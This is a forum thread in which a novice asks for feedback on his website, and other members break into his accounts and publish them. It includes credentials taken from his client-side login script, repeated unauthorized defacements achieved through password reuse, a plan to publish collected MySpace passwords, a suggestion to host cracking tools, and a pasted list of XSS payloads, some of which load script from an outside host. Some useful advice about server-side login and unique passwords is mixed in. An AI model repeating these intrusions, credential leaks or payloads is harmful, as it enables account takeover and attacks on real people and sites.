Hello I am a noob web designer just looking for some feedback thought this was a good fourm so plz check it out and POST BACK :cool:
http://www.z-zap.com

NO POSTS AHHH well w/e just have to wait

It's not a security vulnerability, but there's no way you can make a login page without using a server side language like PHP or ASP. Your member login page is currently .html.

Hello I am a noob web designer just looking for some feedback thought this was a good fourm so plz check it out and POST BACK :cool:
http://www.z-zap.com

Comments:


Flash is not intended for website layout; especially not navigation bars - it is for animations and interactive applications. I block all flash from loading. If you expect people to browse your pages, design them with as little flash as possible.


It looks like you made your site using an automated program or template. Doing so doesn't constitute web design.


People visit websites for content - for example, this forum has information, tools, and a forum. Phrases like "under construction" remind me of the freewebs/geocities era, where websites have nothing but a contact page. You have to ask yourself, why would they contact you? You haven't done anything for them. It comes down to this: create a website after you already know what its purpose is. The UFO also comes under the 'pointless' category.


Sponsors is spelled sponsors, not sponsers.


Sorry if that sounded over-critical, but if nobody corrects you, you will never improve.


It's not a security vulnerability, but there's no way you can make a login page without using a server side language like PHP or ASP. Your member login page is currently .html.

You can make a login page in any language - all it has to do is show a form and direct the user to the login script when they click submit. However, the login script must be in a server-side language.

well, besides what mike said, cough, its pretty good

Either way, he needs to know about PHP (or any other server side language) so he can make a login page/script/whatever.

Comments:


Flash is not intended for website layout; especially not navigation bars - it is for animations and interactive applications. I block all flash from loading. If you expect people to browse your pages, design them with as little flash as possible.


It looks like you made your site using an automated program or template. Doing so doesn't constitute web design.


People visit websites for content - for example, this forum has information, tools, and a forum. Phrases like "under construction" remind me of the freewebs/geocities era, where websites have nothing but a contact page. You have to ask yourself, why would they contact you? You haven't done anything for them. It comes down to this: create a website after you already know what its purpose is. The UFO also comes under the 'pointless' category.


Sponsors is spelled sponsors, not sponsers.


Sorry if that sounded over-critical, but if nobody corrects you, you will never improve.



You can make a login page in any language - all it has to do is show a form and direct the user to the login script when they click submit. However, the login script must be in a server-side language.

well your right most login pages are not made in flash and tru i did spell some things wrong but it isnt a template i made all that myself. and by the way where my site is hosted they dont allow a loit of PHP scripts. even tho i dont know php i have tried to learn but couldnt use MySql and part of the reason i started using this forum was to get help with that and some feedback and by the way that you for the feedback.

Think of something that will give you a lot of traffic to your website.I think if you get cracking tools,password lists and stuff like that for hotmail,yahoo.photobucket or myspace you'll have tons of desperate souls wondering around your site. Just my 2 cents....lol

Thats a good idea but im too noob to get those things myself so any ideas on that i mean ya i was thinking of maybee making some prank programs in VB.net like sumtin that like pretends to wipe harddrives or sumtin just to ammuse ppl before i can get some good stuff up there like cracking tools,password lists and more!:cool: so unless i get some helop ya

Hello people i am starting to learn Javascript so i dicided to redo my site so plz take anoter look at it.

I still can't see the point of your site. Can you please tell me it's purpose? :confused:

I just got access to all the usernames/passwords for your site - all 4 of them, lol.

Check your private messages, I pm'ed you all of them.

NEVER EVER make a login script/page/whatever without using a server side language like PHP or ASP. It is very insecure.

I just got access to all the usernames/passwords for your site - all 4 of them, lol.

Check your private messages, I pm'ed you all of them.

NEVER EVER make a login script/page/whatever without using a server side language like PHP or ASP. It is very insecure.

Anyone who designs a login mechanism around Javascript deserves to lose their data.

Here are the usernames and passwords (the members page contains nothing though):

Username: bango20*
Password: puppies

Username: cryptosparrow
Password: dragon*4

Username: zackymcharvest
Password: dos

Username: kristen
Password: monkey

Even i found all the usernames and passwords, and i'm useless...

http://z-zap.com/login.js

mike, You didn't have to post them you know, but since the member login area doesn't really contain anything, I guess it's alright.

Also, you can go to z-zap and go to /members.html and see all the member content without having to even use any of that login information.

EDIT: Mike, did you do that to his site? That's mean..

How did you do that anyway?

Nice job lol didnt expect for anyone to try and hack it lol just using it for my friends hoping to expand later but ya i tryed to learn PHP still trying i used a editor but failed because i couldnt use mysql if someone could helo me it would b much apprichated. thank you

mike, You didn't have to post them you know, but since the member login area doesn't really contain anything, I guess it's alright.

Also, you can go to z-zap and go to /members.html and see all the member content without having to even use any of that login information.

EDIT: Mike, did you do that to his site? That's mean..

How did you do that anyway?

Did I do what to his site?

Did I do what to his site?

Somebody hacked it. They changed the logo so it read "Z-Crap.com", had a scrolling marquee that read "If i used PHP my site wouldn't have been hacked", and, (for some odd reason), there was a picture of a troll :p


i tryed to learn PHP still trying i used a editor but failed

Freewebs don't allow any PHP, so you'll need to find another host.

Somebody hacked it. They changed the logo so it read "Z-Crap.com", had a scrolling marquee that read "If i used PHP my site wouldn't have been hacked", and, (for some odd reason), there was a picture of a troll :p



Freewebs don't allow any PHP, so you'll need to find another host.

Haha, z-crap... Well, his ftp password was probably the same as the members login password, so whoever did this wasn't so great.

there was a picture of a troll

If I didn't know any better....

You guys know bango20*? So happens he has a freewebs site too, with the same password.

Bango20* is trinoid.

He also uses the same password for everything, i checked :p

I guess that's how someone hacked his site. They must of done a whois on the domain z-zap.com, signed into the email account which is contained in the whois information, got freewebs to send his password and username via email, signed into his freeweb account for z-zap.com then changed a few things..

I still wonder why there was a picture of a troll on his site though :p

I s***est trinoid changes his passwords, and don't use the same password for everything.

Well, I did some redecorating on his freewebs page www.freewebs.com/bango20*

What? I couldn't resist it:D

Troll, don't act like you don't know why a troll pic is was on his site.:D

yas i know freewebs doesnt allow PHP but i havr a yeatr subscriotion for it so ya i dont know of any free servers i can use and neways i dont know how to use mysql

Well Brad Wilehm You can go to here to learn some SQL

http://www.w*schools.com/sql/default.asp

BTW, is Blu your gf?

hehe.. nice work Moonbat :p

We are cruel...

trinoid got pwned!!! Got anymore websites we can play around with?

Brad, look at this (http://www.freevirtualservers.com/free-hosting.htm).. they offer free hosting which allows PHP.

You don't learn do you Brad.

Go back to z-zap people.

Btw...

People are still sending my their myspace passwords. I have almost *5 different ones now...

Maybe i should publish the list here? :p

They deserve it, after all, if you had been telling the truth, they would have used that fake method to hack others.

Good point,

They are willing to hack other people's accounts, therefore it's fair to publish their passwords...

It will also teach them some lessons..

I'll publish the list tomorrow, it's *am here and i need some sleep..

lol nice well now what passwords do i need to change what ones do ya know?:confused:

what passwords do i need to change

Change them all.

ok i will but you know that free server site that someone posted well ty but it is not supported for free in the US so can somebody help me find a goodone that allows PHP

ok i will but you know that free server site that someone posted well ty but it is not supported for free in the US so can somebody help me find a goodone that allows PHP

I use http://www.awardspace.com because they have good PHP hosting and MySQL databases.

i got a host YAY but now i need a PHP editor can anyone help me where is a good free one:D :confused:

still cant find a editor but ya i made this ha im starting to learn with the two most used words in programming http://bango20*.t*5.com/helloworld.php

For (insert religious deity here)'s sake, learn some security man! I just h4x0r*d your new PHP site.

You can see the same message on your site.

EDIT: Did you shut down z-zap.com? I tried going to it now, which took me to OpenDNS and said that your site doesn't resolve

I've added my own little message on his site too :)

Lol, this is the most fun directly/indirectly relating to this site. Thank you all for giving me something to do besides answer questions from never-gonna-be-hackers. But I gotta hit the sack (go to sleep for all you forenigers) so I'll be getting off now. Good night!

http://bango20*.t*5.com/

Change all your passwords.


http://bango20*.t*5.com/index*.php It didn't take long.

It seems you've finally taken our advice and changed your passwords. (Or someone else has changed them for you)

Well done. I hope you liked the improvement i made on http://bango20*.t*5.com/ 's homepage.

EDIT:


Hello Moonbat && troll I changed my passwords I dont think that you will be able to figure this one out. I have only used it for one thing before so good luck trying to get into this site now lol
Is that a challenge?

I hope it was a challenge because i just hacked your site again...

Ask me if you want your new passwords.. your T*5.com password is still 2**00**0***6

I think you've all proven now that you can enter passwords into a text box when they are straight up given to you.


still cant find a editor but ya i made this ha im starting to learn with the two most used words in programming http://bango20*.t*5.com/helloworld.php

Try notepad, or any text editor.

Couldn't you all have spent this time doing something useful...

Like what?

Like what?

I don't know, but my point is this thread became pointless after about the 5th hack.

Well, there's nothing better to do on this site besides answer stupid questions/hack requests and expose lame scammers.

and plus they are really helping me upgrade my security even tho they may not kno it and :eek: im still str***ling with tis PHP script can u tell me whats wrong


<?php

/**
*
*
* @version $Id$
* @copyright 2006
*/

$password = 'letmein';


if ($password == $_post['pass']) {

print 'logged in';
}else{

print <<<_html_

<form method="post" action=" $_server[PHP_SELF] ">
<input type="text" value="password" name="pass">
<input type="submit" Value="LOGIN">
</form>

_html_;
}
?>

ty

Instead of using


<form method="post" action=" $_server[PHP_SELF] ">


I think action should be changed to the name of your php page that validates input, like


<form method="post" action="login.php">

THANKS ill try it

all it did was say login.php when i tried it in my editor should i upload it and try??

IT Didnt work OMG lol im confused thats what me book said to do

Location: Find out and I'll give you $*00

Really? Are you sure?

trinoid, if you didn't upload your login.php (or whatever your login page is called) to the same directory as the page where the person logs in, then it worn't work. You could just write it full like this


action="http://www.yoursite.com/login.php">

@Troll, I'm talking about exact address, not just my location. You can easily find out what city I'm in.

i got it to work i just had to make some things varriables so ya and i have a good editor now i like it:D

I'm talking about exact address, not just my location. You can easily find out what city I'm in.

Oh ok...


i got it to work i just had to make some things varriables so ya and i have a good editor now i like it

I can't wait to hac... i mean, test the security of your website.

lol im not useing that for a password entry thing its just for testing but ya let me change the password then u can try and oh ya dont cheat by looking at it by loggin into my t*5 account

dont cheat by looking at it by loggin into my t*5 account

Anyone reading this will have the same information as me, therefore if i can log into your t*5 account anybody can.

All hackers cheat.. you need to make your site *00% secure so nobody (including me and moonbat) can hack it

well i dont know how you got my new password i just dont

It's difficult to explain, (or i'm rubbish at explaining things)...

You use the same password for everything, so i only had to find out the new password for one thing (your gmail account) then i can access everything.

oh ok ic then im gunna go change all my passwords once more
starting with my gmail this time!
:cool:

WHATS MY GMAIL PASSWORD PLZ:confused:

Try using different passwords for different accounts etc..

It's Trollsrule .... or Trollrules ... i can't remember :p

ok i changed my gmail password to the most random thing ever lols:eek:

i bet you'll forget it in the future

nope it has significant value to me and only me:D

I'm sorry brad, try logging in to your gmail account again.

trinoid, you forgot to change your passowrd to bnainc(@)**********
You also missed changing your ebay account, and you still didn't fix z-zap.com

HOW OMG HOW HOW HWO HOW!!!!!!!! lol tell me what i need to do

I got into your bradleywilhelm account again.

Can You Please Tell Me What I Need To Do To Make It Secure

I'll pm you what to do.

*Troll quickly changes all of brad's passwords*

Just kidding :p

lol ya funny that would rly suck

Did you get my message trinoid?

If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.

He had his PayPal account's password diferent from the begining.

Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"

Finally trinoid changed his gmail passwords!

ya i did changed both passwords and working on the rest

Yipeeeee!!

Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savy.

I hope it's the end :p

I'm bored, now what'll we do?

I'm bored too...

Brad- change all your passwords back

thank you very much

ok ok i think that im done nope i need to change one or two more but ty guys this has been fun and i hope that maybee we can be friends and not just you guys like attacking my site lol well ya ok im gunna go finish:D ill post back on this thread

Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up

<img src='john.jpg' onerror='alert(document.cookie)'>

Here's one I found online

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Yet again

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>

Differnet encodings: should output alert(xss) or whatever

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#0000*06&#00000*7&#0000**8&#00000*7&#0000**5&#00000**&#0000**4&#0000*05&#0000**2&#0000**6&#0000058&#00000*7&#0000*08&#0000*0*&#0000**4&#0000**6&#0000040&#00000**&#0000088&#000008*&#000008*&#00000**&#000004*>

<IMG SRC=&#x6A&#x6*&#x76&#x6*&#x7*&#x6*&#x72&#x6*&#x70&#x74&#x*A&#x6*&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x5*&#x5*&#x27&#x2*>

<IMG SRC="jav ascript:alert('XSS');">

Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<iframe src=http://ha.ckers.org/scriptlet.html>

what is that?

It can let you run JavaScript commands on a website as if they were coming from the server.

oh cool so thats how you inject it huh like <img src="javascript:alert("LIKE THIS?")">

<img src='javascript:alert("HELLO")'>

Yeah, but these forums aren't vulnerable

Put this in your web browser's address bar


javascript:alert("Hello");
A popup shoudl come up saying Hello. Injections can use any javascript code, it just has to be sytaxed a little differently.

oh ok ya i nkow a lol bit of java lol thats how u got my password

Good nIght guys :rolleyes:

Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up

<img src='john.jpg' onerror='alert(document.cookie)'>

Here's one I found online

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Yet again

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>

Differnet encodings: should output alert(xss) or whatever

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#0000*06&#00000*7&#0000**8&#00000*7&#0000**5&#00000**&#0000**4&#0000*05&#0000**2&#0000**6&#0000058&#00000*7&#0000*08&#0000*0*&#0000**4&#0000**6&#0000040&#00000**&#0000088&#000008*&#000008*&#00000**&#000004*>

<IMG SRC=&#x6A&#x6*&#x76&#x6*&#x7*&#x6*&#x72&#x6*&#x70&#x74&#x*A&#x6*&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x5*&#x5*&#x27&#x2*>

<IMG SRC="jav ascript:alert('XSS');">

Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<iframe src=http://ha.ckers.org/scriptlet.html>

I'm sure I explained about this before.

The vulnerability I found was in the search box of this website (the box in the top right of the page, next to 'latest news'), and is part of the actual website.

The vBulletin forum we are posting in now has not been coded by the makers of this website, and has no relation to a bug in the website's programming. In other words, there is a vulnerability in this website's search box, but not the forum. vBulletin is a professional forum package and is mostly free of bugs. When hundreds of thousands of people rely on it for discussions, it has a certain responsibility to protect its users. Searching for vulnerabilities in forums is totally pointless.

Forum = created by vBulletin staff.
All-nettools.com = created by all-nettools.com staff.

If a member of all-nettools staff creates a programming error, the forum remains unchanged because he didn't create the forum.


It can let you run JavaScript commands on a website as if they were coming from the server.

XSS vulnerabilities allow you to send users custom content when they request a page. The vulnerabilities allow you to inject code into a user's page. They are client-side, and have no impact on the server itself.

Ah, well, I got that definition from another site anyway.

I know you told me about this before, I just wanted to keep trying. If everyone assumed everything was secure, and didn't try to find a hole in the security, hacking would cease to exist.